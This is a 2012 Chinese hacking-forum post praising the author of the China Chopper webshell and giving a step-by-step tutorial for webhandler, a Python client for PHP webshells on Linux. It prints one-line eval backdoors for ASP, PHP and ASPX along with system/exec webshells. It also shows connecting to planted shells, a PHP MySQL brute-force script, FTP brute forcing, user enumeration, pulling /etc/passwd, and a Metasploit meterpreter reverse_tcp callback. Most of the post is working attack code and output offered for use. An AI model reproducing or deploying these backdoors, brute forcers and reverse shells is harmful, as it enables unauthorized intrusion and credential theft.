切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
342 Linux下的 菜刀 webhandler[复制链接]
发表于 2012-11-8 00:47:40 | 显示全部楼层 |!read_mode!
前言

说起菜刀,就不得不提起菜刀的作者,作者是一个退伍军人,生长在一个贫穷的农村,据说初中也没读完,英语更是不咋地,但他却自学掌握了

C++/J2ME/PHP/JSP/ASP.NET(C#,VB,C++,delphi,J#)/ASP/MySQL/MsSQL/Oracle/Informix/PostgreSQL/DB2/Sybase/Access/UNIX/LINUX/WIN/SEO/Flash(AS)/PhotoShop/Freehand等等,当初在六七年前台湾闹独立的时候,他在国民党和民进党的网站上留下了“只有一个中国”的黑页,一举成名。作者是一个朴实,低调的技术牛人,他这些年留下的作品很多,中国菜刀是他最新的一个作品,从他之前的作品WEBSHELL管理器的基础上修改而来,功能更加的强大。你见过很强大的ASP后门,很强大的PHP后门,很强大的ASPX后门,那你见过很强大的asp,aspx,php三合一后门么……..,没有吧,尤其是这个后门,只有一句话。Asp环境:
  1. <%eval request("a")%>
复制代码
Php环境:
  1. <?php @eval($_POST['a']);?>
复制代码
Aspx环境:
  1. <% @page Language="Jscript"><%eval(Request.item["a"],"unsafe");%>
复制代码
是不是很震憾,很不可思议,是的,我刚接触的时候,也是这样的想法,就这三句话,一个名不见经传的“中国菜刀”,就可以代替我那搜集了几年,大大小小几百个多种平台多种环境的脚本后门?,事实证明,我错了,原来“中国菜刀”不仅仅可以代替那些后门,而且他的功能超出我的想象,没试过 菜刀 FOR WINE,不知道能否在LINUX下运行,不过有个类似的工具 webhandler , 脚本:PYTHON
介绍他指出POST 和 GET的提交方式,只支持PHP脚本运行 客服端:
  1. <?php system($_GET['cmd']); ?>
  2.     <?php passthru($_REQUEST['cmd']); ?>
  3.     <?php echo exec($_POST['cmd']); ?>
复制代码

使用安装
  1. root@Dis9Team:/pen/door# wget http://dis9-server.googlecode.com/files/webhandler.zip
  2. root@Dis9Team:/pen/door# unzip webhandler.zip
  3. root@Dis9Team:/pen/door# cd webhandler
  4. root@Dis9Team:/pen/door/webhandler# apt-get install python-setuptools
  5. root@Dis9Team:/pen/door/webhandler# easy_install argparse
复制代码


客服端使用GET提交
  1. root@ubuntu:/var/www# echo '<?php system($_GET['cmd']); ?>' > /var/www/get.php
复制代码


链接
  1. root@Dis9Team:/pen/door/webhandler# python2.7 webhandler.py --url http://5.5.5.3/get.php?cmd=

  2.                 ________         __     _______                 __ __            
  3.                 |  |  |  |.-----.|  |--.|   |   |.---.-.-----.--|  |  |.-----.----.
  4.                 |  |  |  ||  -__||  _  ||       ||  _  |     |  _  |  ||  -__|   _|
  5.                 |________||_____||_____||___|___||___._|__|__|_____|__||_____|__|  
  6.                 -------------------------------------------------------------------------
  7.                   [!] "non-git". Keep up-to-date by running '--update'
  8.         -------------------------------------------------------------------------------------------------------------
  9.         User         : www-data
  10.         ID           : uid=33(www-data) gid=33(www-data) groups=33(www-data)
  11.         Kernel       : Linux ubuntu 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
  12.         CWD          : /var/www                drwxrwxrwx
  13.         Uptime       : 4 minutes
  14.         Target's IPs : 5.5.5.3
  15.         Our IP       : 174.139.7.227
  16.         -------------------------------------------------------------------------------------------------------------

  17.         [+] Available commands: @backdoor, @download, @enum, @history, @info, @update, @upload, @brute, clear, exit
  18.         [+] Inserting ! at the begining of the command will execute the command locally (on your box)

  19. www-data@5.5.5.3:~(/var/www):$ id
  20. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  21. www-data@5.5.5.3:~(/var/www):$
复制代码


POST提交

  1. root@ubuntu:/var/www# echo '<?php echo exec($_POST['cmd']); ?>' > post.php
复制代码


链接
  1. root@Dis9Team:/pen/door/webhandler# python2.7 webhandler.py --url http://5.5.5.3/post.php --method POST --parameter cmd

  2.                 __          __  _     _    _                 _ _
  3.                 \ \        / / | |   | |  | |               | | |
  4.                  \ \  /\  / /__| |__ | |__| | __ _ _ __   __| | | ___ _ __
  5.                   \ \/  \/ / _ \ '_ \|  __  |/ _` | '_ \ / _` | |/ _ \ '__|
  6.                    \  /\  /  __/ |_) | |  | | (_| | | | | (_| | |  __/ |
  7.                     \/  \/ \___|_.__/|_|  |_|\__,_|_| |_|\__,_|_|\___|_|
  8.                 -----------------------------------------------------------
  9.                   [!] "non-git". Keep up-to-date by running '--update'
  10.         -----------------------
  11.         User         : 5.5.5.3
  12.         ID           : Unknown
  13.         Kernel       : Unknown
  14.         CWD          : Unknown                Unknown
  15.         Uptime       : Unknown
  16.         Target's IPs : Unknow
  17.         Our IP       : 174.139.7.227
  18.         -----------------------

  19.         [+] Available commands: @backdoor, @download, @enum, @history, @info, @update, @upload, @brute, clear, exit
  20.         [+] Inserting ! at the begining of the command will execute the command locally (on your box)

  21. 5.5.5.3@Unknow:~(Unknown):$ id
  22. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  23. 5.5.5.3@Unknow:~(Unknown):$
复制代码


监听功能先监听端口
  1. root@Dis9Team:/pen/door/webhandler# python2.7 webhandler.py --listen 1234

  2.                 #     #               #     #                                          
  3.                 #  #  # ###### #####  #     #   ##   #    # #####  #      ###### #####  
  4.                 #  #  # #      #    # #     #  #  #  ##   # #    # #      #      #    #
  5.                 #  #  # #####  #####  ####### #    # # #  # #    # #      #####  #    #
  6.                 #  #  # #      #    # #     # ###### #  # # #    # #      #      #####  
  7.                 #  #  # #      #    # #     # #    # #   ## #    # #      #      #   #  
  8.                  ## ##  ###### #####  #     # #    # #    # #####  ###### ###### #    #
  9.                 -------------------------------------------------------------------------
  10.                   [!] "non-git". Keep up-to-date by running '--update'

  11. [i] Waiting on port: 1234
复制代码

运行PHP REVER SHELL 获得SHELL
获得系统信息
  1. # root@5.5.5.3:~(/var/www):$ @info
  2.         -------------------------------------------------------------------------------------------------------------
  3.         User         : root
  4.         ID           : uid=0(root) gid=0(root) groups=0(root)
  5.         Kernel       : Linux ubuntu 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
  6.         CWD          : /var/www                drwxrwxrwx
  7.         Uptime       : 11 minutes
  8.         Target's IPs : 5.5.5.3
  9.         Our IP       : 174.139.7.227
  10.         -------------------------------------------------------------------------------------------------------------

  11.         [+] Available commands: @backdoor, @download, @enum, @history, @info, @update, @upload, @brute, clear, exit
  12.         [+] Inserting ! at the begining of the command will execute the command locally (on your box)

  13. root@5.5.5.3:~(/var/www):$
复制代码


暴力破解MYSQL默认字典: modules/bruters/wordlist.txt,他会自动上传

这个东西有点占用进程.

核心代码
  1. #!/usr/bin/env php
  2. <?php
  3. error_reporting(0);
  4. $host = "127.0.0.1";

  5. $user_dict = "wordlist.txt";
  6. $pass_dict = "wordlist.txt";

  7. $userFile = file($user_dict);
  8. $passFile = file($pass_dict);

  9. $success;
  10. foreach ($userFile as $user) {
  11.     if ($success == 1) {
  12.         break;
  13.     }
  14.     foreach ($passFile as $pass) {
  15.         $user = trim($user);
  16.         $pass = trim($pass);
  17.         $connection = mysql_connect($host, $user, $pass);
  18.         if ($connection) {
  19.             echo "success:" . $user . ":" . $pass . "\n";
  20.             $success = 1;
  21.             mysql_close($connection);
  22.             break;
  23.         }
  24.     }
  25. }
  26. ?>
复制代码

暴力FTP一样
  1. 5.5.5.3@Unknow:~(Unknown):$ @brute  ftp
复制代码

查看用户组
  1. 5.5.5.3@Unknow:~(Unknown):$ @enum group
  2. [+] Total number of groups: 1
  3. -------------------------------------------------------
  4. Group Name      | Password    | Group ID | Group List |
  5. -------------------------------------------------------
  6. honeyd          | *In shadow* | 115      |            |
  7. -------------------------------------------------------
  8. 5.5.5.3@Unknow:~(Unknown):$ @enum passwd
  9. [+] Total number of users: 1
  10. ---------------------------------------------------------------------------------------------------------------------------------
  11. Username          | Password    | User ID | Group ID | User Info                           | Home Directory               | Shell
  12. ---------------------------------------------------------------------------------------------------------------------------------
  13. b                 | *In shadow* | 1004    | 33       |                                     | /dev/null                    | /usr/sbin/nologin
  14. ---------------------------------------------------------------------------------------------------------------------------------
  15. 5.5.5.3@Unknow:~(Unknown):$
复制代码


貌似是个蜜罐 哈哈哈下载文件

  1. 5.5.5.3@Unknow:~(Unknown):$ @download /etc/passwd

  2. [+] Successfully downloaded "/etc/passwd" to "/pen/door/webhandler/output/Unknow/etc/passwd_2012-10-22"
  3. 5.5.5.3@Unknow:~(Unknown):$
复制代码


执行本地命令

  1. 5.5.5.3@Unknow:~(Unknown):$ !cat /pen/door/webhandler/output/Unknow/etc/passwd_2012-10-22
  2. b:x:1004:33::/dev/null:/usr/sbin/nologin
复制代码


上传文件

  1. 5.5.5.3@Unknow:~(Unknown):$ @upload /etc/passwd passwd
  2. [+] Successfully uploaded /etc/passwd to passwd
  3. 5.5.5.3@Unknow:~(Unknown):$ cat passwd
  4. nepenthes:x:119:129::/home/nepenthes:/bin/false
复制代码


貌似两个都是蜜罐 哈哈哈~反弹Msf TCP SHELL启动监听
  1. root@Dis9Team:~# msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=5.5.5.4 LPORT=123 E
  2. [*] Please wait while we load the module tree...

  3. ______________________________________________________________________________
  4. |                                                                              |
  5. |                   METASPLOIT CYBER MISSILE COMMAND V4                        |
  6. |______________________________________________________________________________|
  7.       \                                  /                      /
  8.        \     .                          /                      /            x
  9.         \                              /                      /
  10.          \                            /          +           /
  11.           \            +             /                      /
  12.            *                        /                      /
  13.                                    /      .               /
  14.     X                             /                      /            X
  15.                                  /                     ###
  16.                                 /                     # % #
  17.                                /                       ###
  18.                       .       /
  19.      .                       /      .            *           .
  20.                             /
  21.                            *
  22.                   +                       *

  23.                                        ^
  24. ####      __     __     __          #######         __     __     __        ####
  25. ####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
  26. ################################################################################
  27. ################################################################################
  28. # WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
  29. ################################################################################



  30.        =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
  31. + -- --=[ 939 exploits - 533 auxiliary - 151 post
  32. + -- --=[ 252 payloads - 28 encoders - 8 nops
  33.        =[ svn r15876 updated 56 days ago (2012.08.27)

  34. Warning: This copy of the Metasploit Framework was last updated 56 days ago.
  35.          We recommend that you update the framework at least every other day.
  36.          For information on updating your copy of Metasploit, please see:

  37. https://community.rapid7.com/docs/DOC-1306

  38. PAYLOAD => linux/x86/meterpreter/reverse_tcp
  39. LHOST => 5.5.5.4
  40. LPORT => 123
  41. [*] Started reverse handler on 5.5.5.4:123
  42. [*] Starting the payload handler...
复制代码

运行模块反弹
  1. 5.5.5.3@Unknow:~(Unknown):$ @backdoor msf 5.5.5.4:123

  2. [i] Found the metasploit framework:

  3. [+] Found a directory to use: '/var/www/pen/upload'
  4. [+] Filename: '4hFBAoup'

  5. [i] Make sure: '5.5.5.4' has a listener shell setup on port: '123' (hint: msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=5.5.5.4 LPORT=123 E)
  6. [?] Press <return> when ready!
  7. [i] Generating linux/x86/meterpreter/reverse_tcp
复制代码

获得SHELL


参考
PHP后门 : WeBaCoo 利用 :http://www.3g-sec.com/thread-374-1-1.html


PHP后门 : WeBaCoo : http://fuzzexp.org/php-backdoor-webacoo.html


Metasploit BackDoor For Windows : http://fuzzexp.org/metasploit_backdoor.html









附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-21 07:10

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部